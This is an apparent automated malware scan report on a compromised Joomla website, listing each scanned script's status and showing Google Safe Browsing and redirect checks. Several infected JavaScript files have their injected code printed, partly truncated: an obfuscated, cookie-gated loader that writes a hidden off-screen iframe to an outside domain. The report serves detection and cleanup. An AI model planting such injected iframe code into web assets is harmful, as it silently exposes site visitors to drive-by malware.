Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=biznes-design.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://biznes-design.ru/ | 200 OK Content-Length: 32711 Content-Type: text/html | clean |
http://biznes-design.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 112123 Content-Type: application/x-javascript | clean |
http://biznes-design.ru/media/system/js/core.js | 200 OK Content-Length: 20545 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Ch ...[3797 bytes skipped]... Decoded script: <iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe> | ||
http://biznes-design.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 15691 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Ch ...[1490 bytes skipped]... Decoded script: <iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe> | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js | 200 OK Content-Length: 85260 Content-Type: text/javascript | clean |
http://biznes-design.ru/media/plg_jblibrary/jquery/jquery.noconflict.js | 200 OK Content-Length: 15706 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1 if (cookie == undefined) { setCookie('tu'+'ge'+'ne'+'13'+'ve'+'ca1'+'ka'+'a9', true, 86400); document.write('<i'+'f'+'ra'+'me'+' s'+'rc'+'='+'http://reactor.androidnoticia.com.br/?id=bill'+' s'+'t'+'y'+'l'+'e'+'='+'p'+'o'+'s'+'i'+'t'+'i'+'o'+'n'+':'+'a'+'b'+'s'+'o'+'l'+'u'+'t'+'e'+';'+'l'+'e'+'f'+'t'+':'+'-1800px;top:-1800px;'+' height="199" width="199">'+'</i'+'fr'+'ame>'); } } })(); $.noConflict(); Decoded script: <iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe> Antivirus reports:
| ||
http://biznes-design.ru/media/plg_jblibrary/jquery/jquery.lazyload.js | 200 OK Content-Length: 17861 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Ch ...[3723 bytes skipped]... Decoded script: <iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe> | ||
http://biznes-design.ru/media/system/js/modal.js | 200 OK Content-Length: 25493 Content-Type: application/x-javascript | clean |
http://biznes-design.ru/media/k2/assets/js/jquery-1.7.1.min.js | 200 OK Content-Length: 109629 Content-Type: application/x-javascript | clean |
http://biznes-design.ru/components/com_k2/js/k2.js | 200 OK Content-Length: 22579 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1 }); // Equal block heights for the "default" view $K2(window).load(function () { var blocks = $K2('.subCategory, .k2EqualHeights'); var maxHeight = 0; blocks.each(function(){ maxHeight = Math.max(maxHeight, parseInt($K2(this).css('height'))); }); blocks.css('height', maxHeight); }); ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Decoded script: <iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe> Antivirus reports:
| ||
http://biznes-design.ru/templates/shaper_event/js/tools.js | 200 OK Content-Length: 17186 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1 }) function sp_margin(container, dir){ if (typeof(dir)==='undefined') dir = 'right'; var rtl = document.getElement('.rtl'); if (rtl) { if (dir==='right') { dir = 'left'; } else { dir = 'right'; } } var c_width = (window.getSize().x - document.getElements('.sp-wrap')[0].getWidth())/2; document.id(container).setStyle('margin-' + dir, - c_width ); };;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Decoded script: <iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe> Antivirus reports:
| ||
http://biznes-design.ru/plugins/system/helix/js/menu.js | 200 OK Content-Length: 20582 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Ch ...[3721 bytes skipped]... Decoded script: ...[11752 bytes skipped]... lect_box.injectInside(selector);document.getElements('ul.sp-menu a.menu-item').each(function(el){optText=' '+el.get('text');optSub=el.getParents('ul').hasClass('sp-menu');len=optSub.length;dash;if(el.getParents('ul').hasClass('sp-menu')){dash=Array(len).join('–');optText=dash+optText}opt=new Element('option',{"value":el.href,"html":optText,"selected":el.href==window.location.href});opt.injectInside(select_box)})}}); <iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe> | ||
http://biznes-design.ru/templates/shaper_event/js/totop.js | 200 OK Content-Length: 16737 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1 var a = document.id('topofpage'); if (a) { a.set('opacity','0').setStyle('display','block'); window.addEvent('scroll',function(e) { a.fade((window.getScroll().y > 300) ? 'in' : 'out') }); var b = new Fx.Scroll(window); a.addEvent('click', function (e) { new Event(e).stop(); b.toTop() }) } });;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Decoded script: <iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe> Antivirus reports:
| ||
http://biznes-design.ru/modules/mod_sptab/assets/js/sptab.js | 200 OK Content-Length: 19938 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Ch ...[3722 bytes skipped]... Decoded script: ...[10058 bytes skipped]... yle("top",-e+"px");b={top:[-e,0]}}else{this.items[a].setStyle("top",e+"px");b={top:[e,0]}}break}new Fx.Elements([this.items[g],this.items[a],this.items_mask],{duration:this.options.fxduration,transition:this.options.transition,onComplete:function(){this.running=false}.bind(this)}).start({"0":{display:'none'},"1":$merge({display:'block'},b),"2":{height:[e,this.options.autoHeight?this.items[a].getHeight():this.options.fixedHeight]}})}}; <iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe> | ||
http://biznes-design.ru/PopIn.js | 404 Not Found Content-Length: 206 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: biznes-design.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 03:43:30 GMT
Server: nginx/1.6.2
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Set-Cookie: 3f83f744190cbb4b99f87758800a53ef=55fef50ec4820365e91e19974b36f644; path=/
Set-Cookie: shaper_event_layout=category; expires=Fri, 26-Dec-2014 04:43:30 GMT; path=/
Set-Cookie: shaper_event_layout=category; expires=Fri, 26-Dec-2014 04:43:30 GMT; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: biznes-design.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 03:43:30 GMT
Server: nginx/1.6.2
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Set-Cookie: 3f83f744190cbb4b99f87758800a53ef=55fef50ec4820365e91e19974b36f644; path=/
Set-Cookie: shaper_event_layout=category; expires=Fri, 26-Dec-2014 04:43:30 GMT; path=/
Set-Cookie: shaper_event_layout=category; expires=Fri, 26-Dec-2014 04:43:30 GMT; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: biznes-design.ru
Referer: http://www.google.com/search?q=biznes-design.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: biznes-design.ru
Referer: http://www.google.com/search?q=biznes-design.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.